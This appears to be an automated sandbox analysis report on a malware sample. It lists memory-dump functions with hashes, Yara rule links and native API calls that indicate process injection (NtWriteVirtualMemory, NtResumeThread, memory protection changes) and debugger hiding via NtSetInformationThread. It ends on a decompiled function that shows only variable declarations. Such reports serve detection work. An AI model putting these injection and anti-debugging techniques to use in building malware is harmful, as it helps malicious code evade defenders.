                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: a8a278a9daa666f710e322c5b5d45d85329d76a6f7786a25080202e91109c51d
                                                  • Instruction ID: 13a2f3a97e3bea528c777c8dc3f8ed79648e0a01cac8bf5904f462472518ff61
                                                  • Opcode Fuzzy Hash: a8a278a9daa666f710e322c5b5d45d85329d76a6f7786a25080202e91109c51d
                                                  • Instruction Fuzzy Hash: 04C17B611593C49ECB1A9E3484AE7FDBF6BFF82204F19419EC8C247963C7299467CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216587D, Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoadMemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3389902171-0
                                                  • Opcode ID: 51a5372b8094a4e76909ecdb33f631f7fbccff6b9ddd59c3859bc3c64d4db93d
                                                  • Instruction ID: 5babd875b3a5b1dad8ef9e940aa744c45970096fd6b891904b6b04881f0c1373
                                                  • Opcode Fuzzy Hash: 51a5372b8094a4e76909ecdb33f631f7fbccff6b9ddd59c3859bc3c64d4db93d
                                                  • Instruction Fuzzy Hash: 67B12B64A84346AEDF349E38C8DC7BD77939F53270F948299DDA24B2D6D3318096C712
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162557, Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: e166824bda65217993629ba20157dba9db49f10f0f67cac33bc6f6614b2fcf3f
                                                  • Instruction ID: 966ccda6cdc1f89ea5a10025dc8f7f3d5409c0241ee8c9915fd3107a734c083a
                                                  • Opcode Fuzzy Hash: e166824bda65217993629ba20157dba9db49f10f0f67cac33bc6f6614b2fcf3f
                                                  • Instruction Fuzzy Hash: 06B167B1780346AFFB215E20CD597FD3A67AF01384F098119ED85A71D1DBBA88A4CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02165F0B, Relevance: 1.8, APIs: 1, Instructions: 324COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60200f336dd192489002f7bcc28ccb41aabaf468bd9b6df2576e0eacafbf0941
                                                  • Instruction ID: c5c5aeafcbc502b206ff8eb35dedc82f6655493337f7d02f70bfaf5413ebc8a7
                                                  • Opcode Fuzzy Hash: 60200f336dd192489002f7bcc28ccb41aabaf468bd9b6df2576e0eacafbf0941
                                                  • Instruction Fuzzy Hash: 59819A6129C3D08EEB1E8B24889D7BD7BABEF12214F5A419EC892C3493D76DD4A5C341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216245B, Relevance: 1.8, APIs: 1, Instructions: 322COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b294b99996b52bed32e2799c70e99da61c43b4ed64835e3c840caae24c798aa
                                                  • Instruction ID: 43a3cddcc102b81d98931450074934705aadd4e190ae0a14c1a274de486b8b18
                                                  • Opcode Fuzzy Hash: 6b294b99996b52bed32e2799c70e99da61c43b4ed64835e3c840caae24c798aa
                                                  • Instruction Fuzzy Hash: E7B167B1780306AFFB215E20CD59BFD3B66BF41784F194128EE85AB1C0D7BA84A4CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021624F2, Relevance: 1.8, APIs: 1, Instructions: 304COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1761e9bebf1f032c3b94e4becaa8e8d724797cf23a5bfe1cf19cd4d32601fe95
                                                  • Instruction ID: f752c51d4e45c521faeac76aa3d56f6487787761af35ddddba5af5d020c4c190
                                                  • Opcode Fuzzy Hash: 1761e9bebf1f032c3b94e4becaa8e8d724797cf23a5bfe1cf19cd4d32601fe95
                                                  • Instruction Fuzzy Hash: F3A159B1780306AFFB215E20CD59BFD3A67BF41784F154128EE85AB1D0D7BA84A4CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021624AE, Relevance: 1.8, APIs: 1, Instructions: 299COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 654b16a9ce94dde89001992c65b8b6f96dc94a9bc77b4bd563a0d2c1c68aadf2
                                                  • Instruction ID: 2c77fab02278d899818c6d197a46a68b4ed5461a918f6253e2b03ce4c69f579b
                                                  • Opcode Fuzzy Hash: 654b16a9ce94dde89001992c65b8b6f96dc94a9bc77b4bd563a0d2c1c68aadf2
                                                  • Instruction Fuzzy Hash: 9DA16AB1780306AFFB215E20CD58BFD3A67BF01784F558128EE84AB1D0D7BA84A5CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021625B2, Relevance: 1.8, APIs: 1, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b5c8a64459ca68dddd260ae93eb201a05ec27f2a32ce6043531ff2d2663c285
                                                  • Instruction ID: e9269c66579882d061e11eaf04bd66e021e661b3278209475171e568f7262a45
                                                  • Opcode Fuzzy Hash: 3b5c8a64459ca68dddd260ae93eb201a05ec27f2a32ce6043531ff2d2663c285
                                                  • Instruction Fuzzy Hash: 409158B0780346AFFB215E20CD597FD3A67BF05384F494128EE859B1D0D7BA88A4CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216272A, Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6e6f1c770ae3879bd845487ffa1324cad629c85e7d3f952766bcda201c085c09
                                                  • Instruction ID: 437e45dac6e7ed64d037eae4859354781eb2a046848ed8aeece70ada1524b8c5
                                                  • Opcode Fuzzy Hash: 6e6f1c770ae3879bd845487ffa1324cad629c85e7d3f952766bcda201c085c09
                                                  • Instruction Fuzzy Hash: D58156B1784394AEFB221E608C997F93F27AF15348F19411CEDC19A4D2C7FA88A5D704
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162626, Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b52e4b432b7ae622102731c35502b877711ebc9828a3c7ce6d673c754305b37b
                                                  • Instruction ID: a2475b8b7a47d3612051def05c08e1310826860dc39cb89e7bb82847b6800f90
                                                  • Opcode Fuzzy Hash: b52e4b432b7ae622102731c35502b877711ebc9828a3c7ce6d673c754305b37b
                                                  • Instruction Fuzzy Hash: A78126B1780346AFFB355E60CD49BFD3A66EF04384F494128EE859B1D0D7BA88A4CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162698, Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a3d427b27f840372dcea6ca257f70356cac5c3c9a9b5a7403472b973608f1e1
                                                  • Instruction ID: 071db96fbef4ca4ca7296b0dcaa898039753d9eac6255b405dffa791019b94ff
                                                  • Opcode Fuzzy Hash: 4a3d427b27f840372dcea6ca257f70356cac5c3c9a9b5a7403472b973608f1e1
                                                  • Instruction Fuzzy Hash: 2D7118B0280345AFFB255E20CD59BF93A66FF14744F498128EE959B1D0C7FA98A4DB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216279A, Relevance: 1.7, APIs: 1, Instructions: 158nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 021629A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: 80da6474394c65c7ad4eeba3ad9e5b87627d1b6c0026200e2d1b610c52807eae
                                                  • Instruction ID: 00cb51940b4a4dcd4325da75878e4b0de3ad5dadb67760964fe94f4de46d363f
                                                  • Opcode Fuzzy Hash: 80da6474394c65c7ad4eeba3ad9e5b87627d1b6c0026200e2d1b610c52807eae
                                                  • Instruction Fuzzy Hash: 795103B1680349AEFF355E20CD88BFD3A67AF04744F194128FE859A1D0C7FA98A4CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02166487, Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14db0cff0f8fc53cbc314b080203c19948db9ab231b98a04c5611ed69426e269
                                                  • Instruction ID: a613b0202f7abbcb94e93c7d293982648c3dfbce2db8c166bef39d09d59fb8ef
                                                  • Opcode Fuzzy Hash: 14db0cff0f8fc53cbc314b080203c19948db9ab231b98a04c5611ed69426e269
                                                  • Instruction Fuzzy Hash: 7441CB212853C2CEDF290E30812E3BDBB5BAF027A6F6D005DCC9283955D36DC4A5C781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02166384, Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9147f6f27e0c9c7be2e9a48398ce4eb32f9d3035a47775c3dae2ce33f66018b9
                                                  • Instruction ID: 5b6d52a30ebd9082602af46eb1e94ad2c6037ddb28b9d02303dfe09561895b5e
                                                  • Opcode Fuzzy Hash: 9147f6f27e0c9c7be2e9a48398ce4eb32f9d3035a47775c3dae2ce33f66018b9
                                                  • Instruction Fuzzy Hash: C04177202883C1CEEF1E4E20C56D7BDAB5FAF02365F9E416ECC5283995D36DC4A4C611
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216637E, Relevance: 1.6, APIs: 1, Instructions: 138nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(00000004,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021666DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 3f49393209737e6b16d98158407b803d5ff10e6e92375f5d448edd75a6232ba2
                                                  • Instruction ID: 19dca29e1a25615e2f2287becec9546d4481b51b1fc27cbc340aacb3b3f478c9
                                                  • Opcode Fuzzy Hash: 3f49393209737e6b16d98158407b803d5ff10e6e92375f5d448edd75a6232ba2
                                                  • Instruction Fuzzy Hash: 6F414D31284282CEEF2D4D24C56D7FD665FAF02765FAA422ADD2283598D33CD4E8C641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02166466, Relevance: 1.6, APIs: 1, Instructions: 137nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(00000004,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021666DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: aee2c297a135935df69993dc5d583f453d24ae64c65e2b7ab7c26d810324be76
                                                  • Instruction ID: ab6e2e96170fb5f831525d81bde1cd67bd9f7516710d0811c7f8d9e053b26fe6
                                                  • Opcode Fuzzy Hash: aee2c297a135935df69993dc5d583f453d24ae64c65e2b7ab7c26d810324be76
                                                  • Instruction Fuzzy Hash: E341BB212883C1CDEF2A0E24C16E7BD6B5FAF013AAF5E015ECD9243895C36DC4B4C641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021663CA, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1c09883ef516f5cf41be9f796bb13b5eb1cfdd6d08201b07687ef6684135da5
                                                  • Instruction ID: d4086dd146da906ec387d32c315fd094a55d5913c18a222d50a03c9f3eb59aac
                                                  • Opcode Fuzzy Hash: a1c09883ef516f5cf41be9f796bb13b5eb1cfdd6d08201b07687ef6684135da5
                                                  • Instruction Fuzzy Hash: F7414520284382CEEF2D4E24C5AD7FD665FAF02765FAE422ECD1283598D33DD4A4C641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02166533, Relevance: 1.6, APIs: 1, Instructions: 132nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(00000004,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021666DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 6fadb5f0d647729c958ea5940151021b53b6dddabb6c08e39a34ac16f183d99d
                                                  • Instruction ID: 6918c908bd675bc7c545196d43cc866d912e2daac36ca81dea980cec99e77175
                                                  • Opcode Fuzzy Hash: 6fadb5f0d647729c958ea5940151021b53b6dddabb6c08e39a34ac16f183d99d
                                                  • Instruction Fuzzy Hash: E041CD606883C0CDEF0A0E34846D3BDBB1FAF12266F9D415ECC8243492D76E80A1C751
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216640E, Relevance: 1.6, APIs: 1, Instructions: 125nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(00000004,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021666DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 3e9e0e0c17805baf5e64d05d0f78e21e7b74a152a2645469c5b92e062cde135d
                                                  • Instruction ID: 2cbc4790a6af63bf14d8cfe1f380ab391eb26ae3653268b0dec80ab2489130d0
                                                  • Opcode Fuzzy Hash: 3e9e0e0c17805baf5e64d05d0f78e21e7b74a152a2645469c5b92e062cde135d
                                                  • Instruction Fuzzy Hash: 2C4144202842C2CEEF2D4E20C56D7FD666BAF027A5F9E426ECD5287594C33CD4A4C641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162831, Relevance: 1.6, APIs: 1, Instructions: 121nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 021629A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: 9bcbf0228121ab16b012b3c36abf96c7f5cda27e127e051b1ac86110f9df6304
                                                  • Instruction ID: 7c412650d95e28df91fec412e44158aaa5be2e6c69bd415a34069cd3c5e7cff4
                                                  • Opcode Fuzzy Hash: 9bcbf0228121ab16b012b3c36abf96c7f5cda27e127e051b1ac86110f9df6304
                                                  • Instruction Fuzzy Hash: F541D6B1680249AEFB355E10CD88BFD3666BF04344F4A4528FE8496190C7BB88E4DB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216288E, Relevance: 1.6, APIs: 1, Instructions: 104nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 021629A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: 15381483db93226bccf93f4b2b04bbc0c31384501ec3dae4cf7e0beb7e335cb9
                                                  • Instruction ID: 5c821713a4d2f327257318f8696efaa3452e308a1c5e62e01ded0ef573b3fd7a
                                                  • Opcode Fuzzy Hash: 15381483db93226bccf93f4b2b04bbc0c31384501ec3dae4cf7e0beb7e335cb9
                                                  • Instruction Fuzzy Hash: D23104B1680249AEFB355E20CD88BFD3A27BF14344F494228EE8496590C7BB98A4CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02166558, Relevance: 1.6, APIs: 1, Instructions: 99nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(00000004,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021666DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 3dee2d157be57ff8bb80fae40683913cca79eaf3536f55c49dd7cceadd4ce15d
                                                  • Instruction ID: 8845a7c450f68b8e10f1d307bd8f681bf1422c95d157b9f15526f60515749c34
                                                  • Opcode Fuzzy Hash: 3dee2d157be57ff8bb80fae40683913cca79eaf3536f55c49dd7cceadd4ce15d
                                                  • Instruction Fuzzy Hash: FC3141216843C1CEEF294E20C46DBBDBA5BAF42766F9D425ECC81475A1C37D90A4CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02166596, Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtResumeThread.NTDLL(00000004,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021666DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 07a97b26450ee016535da6cca50466d499b615bed11722397200c9841e186d84
                                                  • Instruction ID: 6cf9ef8d3e5826683334190903fd456e00921814d162dab8a0a1f45c507c6583
                                                  • Opcode Fuzzy Hash: 07a97b26450ee016535da6cca50466d499b615bed11722397200c9841e186d84
                                                  • Instruction Fuzzy Hash: 3821F170680285CEEF294E24C56CBBDB76BAF42766F9D426ACC41471A1C33DD4E4CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162916, Relevance: 1.6, APIs: 1, Instructions: 80nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 021629A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: 791de30f74580e1383eca37a2a94e2e962594138043a1e7eaf569a2a08b5d2d2
                                                  • Instruction ID: b46d2c9681ba541e35a6f8570f12648e06baa16ba52e4162f6acc4ec8737e86c
                                                  • Opcode Fuzzy Hash: 791de30f74580e1383eca37a2a94e2e962594138043a1e7eaf569a2a08b5d2d2
                                                  • Instruction Fuzzy Hash: 502128B1780255AFEF255E20CD84BED3A27BF14344F4A512CED8596590C7BB88A4DB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216068A, Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12), ref: 0216069E
                                                    • Part of subcall function 02164B00: LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationLibraryLoadThread
                                                  • String ID:
                                                  • API String ID: 543350213-0
                                                  • Opcode ID: 077a73ac15b5d1ec7336785a0bb34c1d296e96c64857c421d248e18dc476e668
                                                  • Instruction ID: b0f6783d5f58cbce93186c1a1bca8b750b6a8f9830b483b6fd01f289a7bc4ff6
                                                  • Opcode Fuzzy Hash: 077a73ac15b5d1ec7336785a0bb34c1d296e96c64857c421d248e18dc476e668
                                                  • Instruction Fuzzy Hash: F801497869431A7FEF2069345CA8BFE2B559B19BA4F950216FD62671C0C760C884CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02163A2C, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02163AC1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a401c2cb02b9c01c6579ef01a005c216ef8428815f4e935effac5f68bcfd6b1b
                                                  • Instruction ID: 311adaeba43820ed411cf2c9221d7625e69977d9bb3d50c3664bfc4b3761d2a7
                                                  • Opcode Fuzzy Hash: a401c2cb02b9c01c6579ef01a005c216ef8428815f4e935effac5f68bcfd6b1b
                                                  • Instruction Fuzzy Hash: 2411CE62A9F3D15DD332AB74065E066BFA2FE53A1071C80CDC0D1490A3C7869626E39E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162986, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 021629A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: 8a6f0260b1ce1e9a06acee5f708c7f8581487e41010b97902ea69c41e54a67c7
                                                  • Instruction ID: 976251a6ac7c4ad8a9c952042e9fb543c734d782c2cd788a0d06091402d87c86
                                                  • Opcode Fuzzy Hash: 8a6f0260b1ce1e9a06acee5f708c7f8581487e41010b97902ea69c41e54a67c7
                                                  • Instruction Fuzzy Hash: 4F1108B1680245AEEF255E60CD947E93B23BF04354F4A5228EDD596490C7BB84A4D744
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02165DB1, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02165978,00000040,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02165DCA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004110F0, Relevance: 183.2, APIs: 100, Strings: 4, Instructions: 1203COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 57%
                                                  			E004110F0(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v44;
				long long _v52;
				char _v56;
				char _v60;
				char _v64;
				long long _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				char _v96;
				signed int _v100;
				char _v104;
				char _v108;
				char _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				intOrPtr _v156;
				char _v164;
				char _v172;
				char _v180;
				char* _v188;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				intOrPtr* _v268;
				signed int _v272;
				char _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				void* _v304;
				void* _v308;
				signed int _v312;
				intOrPtr* _v316;
				signed int _v320;
				intOrPtr* _v324;
				signed int _v328;
				signed int _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr* _v348;
				signed int _v352;
				intOrPtr* _v356;
				signed int _v360;
				intOrPtr* _v364;
				signed int _v368;
				signed int _v372;
				intOrPtr* _v376;
				signed int _v380;
				intOrPtr* _v384;
				signed int _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				char _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				signed int _v440;
				intOrPtr* _v444;
				signed int _v448;
				intOrPtr* _v452;
				signed int _v456;
				intOrPtr* _v460;
				signed int _v464;
				intOrPtr* _v468;
				signed int _v472;
				intOrPtr* _v476;
				signed int _v480;
				intOrPtr* _v484;
				signed int _v488;
				signed int _v492;
